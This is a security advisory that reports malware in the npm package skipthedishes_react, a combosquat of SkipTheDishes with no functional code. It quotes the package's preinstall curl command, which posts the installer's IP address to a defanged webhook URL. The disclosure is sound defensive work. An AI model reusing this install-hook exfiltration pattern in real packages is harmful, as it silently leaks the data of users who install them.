LWA-2026-5169 confirmed malware

skipthedishes_react@0.1.0

Malicious code in skipthedishes_react (npm)

T1195.002 · Compromise Software Supply ChainT1059.004 · Unix ShellT1082 · System Information DiscoveryT1041 · Exfiltration Over C2 Channel

Analysis

The package skipthedishes_react@0.1.0 contains a preinstall script in package.json that, upon installation, runs `curl --data "ip=$(hostname -I)"` to POST the installer's local IP address to the remote endpoint hxxps://webhook-test[.]com/9e564ced26afdbbc9a94ade711456ddb. The package ships no code or functional content — only the malicious hook — and the package name combosquats the SkipTheDishes food delivery service.

analyzed by
Leitwacht
first seen
Jun 14, 2026, 01:02 AM
analyzed
Jun 14, 2026, 01:03 AM

Related advisories

browse all confirmed advisories →

Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.